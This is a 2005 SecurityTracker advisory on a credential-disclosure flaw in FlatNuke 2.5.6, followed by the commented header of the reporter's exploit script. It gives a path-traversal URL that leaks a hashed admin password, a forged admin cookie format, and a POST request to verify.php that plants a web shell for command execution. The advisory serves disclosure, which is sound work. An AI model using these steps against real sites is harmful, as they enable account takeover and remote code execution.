Category:  Application (Forum/Board/Portal)  >  FlatNuke Vendors:  flatnuke.org
FlatNuke 'read' Module Discloses Authentication Credentials to Remote Users
SecurityTracker Alert ID:  1015339
SecurityTracker URL:  http://securitytracker.com/id?1015339
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 11 2005
Impact:  Disclosure of authentication information, User access via network
Exploit Included:  Yes
Version(s): 2.5.6
Description:  A vulnerability was reported in FlatNuke. A remote user can obtain a target user's authentication credentials.

The 'read' module does not properly validate user-supplied input in the 'id' parameter. If magic_quotes_gpc is enabled, a remote user can supply a specially crafted URL to obtain a target user's hashed password. A demonstration exploit URL is provided:

http://[target]/[path]/?mod=read&id=../for um/users/[adminname].php%00

With knowledge of the hashed password, a remote user can create a specially crafted cookie value with the following format to gain access as the target user:

Cookie: myforum:[adminname]; secid:[md5([adminame].[MD5hash])]

With administrative privileges, a user can edit arbitrary PHP files on the target system using the '/flatnuke/verify.php' script.

The vendor was notified in August 2005.

rgod reported this vulnerability.

The original advisory is available at:

http://rgod.altervista.org/flatnuke256_xpl.html

Impact:  A remote user can obtain a target user's authentication credentials and then login as the target user.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.flatnuke.org/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  retrogod@aliceposta.it
Message History:   None.

# Flatnuke 2.5.6 privilege escalation / remote commands execution exploit
# (works with magic_quotes_gpc off, try this with 2.5.5:

# coded by rgod at http://rgod.altervista.org
# mail: retrogod at aliceposta it
# original advisory: http://rgod.altervista.org/flatnuke256_xpl.html

# software:
# site: http://flatnuke.sourceforge.net
# description: a PHP Content Management System

# Explaination: if magic_quotes_gpc you can have any admin/user MD5 password
# hash, poc:
# now you can build an admin cookie:

# Cookie: myforum:[adminname]; secid:[md5([adminame].[MD5hash])]

# as admin, you can edit any php file on target system and insert a shell,
# example:

# POST /flatnuke/verify.php HTTP/1.1
# Content-Type: application/x-www-form-urlencoded
# Host: [target_host]
# Content-Length: [data_length]
# Cookie: [admin_cookie]
# Connection: Close

# mod=modcont&from=index.php&body=[SHELL]&file=forum%2fusers%2f[username].php

# now you launch commands:

# Vendor has notified on August 2005 about credentials disclosure,
# no patch has been released
